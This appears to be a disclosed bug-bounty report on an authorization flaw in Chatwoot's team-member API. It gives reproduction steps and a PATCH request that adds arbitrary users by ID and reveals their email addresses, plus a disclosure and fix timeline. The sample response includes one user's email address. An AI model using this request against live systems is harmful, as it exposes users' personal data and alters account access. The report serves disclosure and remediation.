Improper Authorization lead a user add an arbitrary agent into Team in chatwoot/chatwoot

Valid

Reported on

Aug 15th 2022

Description

A Vulnerability in edit team function lead an user add another user via ID to Team, alternatively know the email of every user in Chatwoot

#Step to reproduce

login to the app -navigate to the Team setting: https://app.chatwoot.com/app/accounts/{id}/settings/teams/list -Create new or edit team -Add agent -> intercept request -modify userid, the response is the email of this user -add succesfullly

Proof of Concept

api: https://app.chatwoot.com/api/v1/accounts/{account.id}/teams/{team_id}/team_members
request body: {"user_ids":[68250]}
method PATCH

Response
[{"id":68250,"account_id":74402,"availability_status":null,"auto_offline":null,"confirmed":false,"email":"amethyst.craft.id@gmail.com","available_name":"Andhra","name":"Andhra","role":null,"thumbnail":""}]

Impact

-add arbitrary users via ID to Team -know every user email in chatwoot

We are processing your report and will contact the chatwoot team within 24 hours. a year ago

We have contacted a member of the chatwoot team and are waiting to hear back a year ago

Sojan Jose validated this vulnerability a year ago

4rth4s has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

We have sent a fix follow up to the chatwoot team. We will try again in 7 days. a year ago

We have sent a second fix follow up to the chatwoot team. We will try again in 10 days. a year ago

Tejaswini Chile marked this as fixed in 2.8 with commit 329e8c a year ago

Tejaswini Chile has been awarded the fix bounty

This vulnerability will not receive a CVE

to join this conversation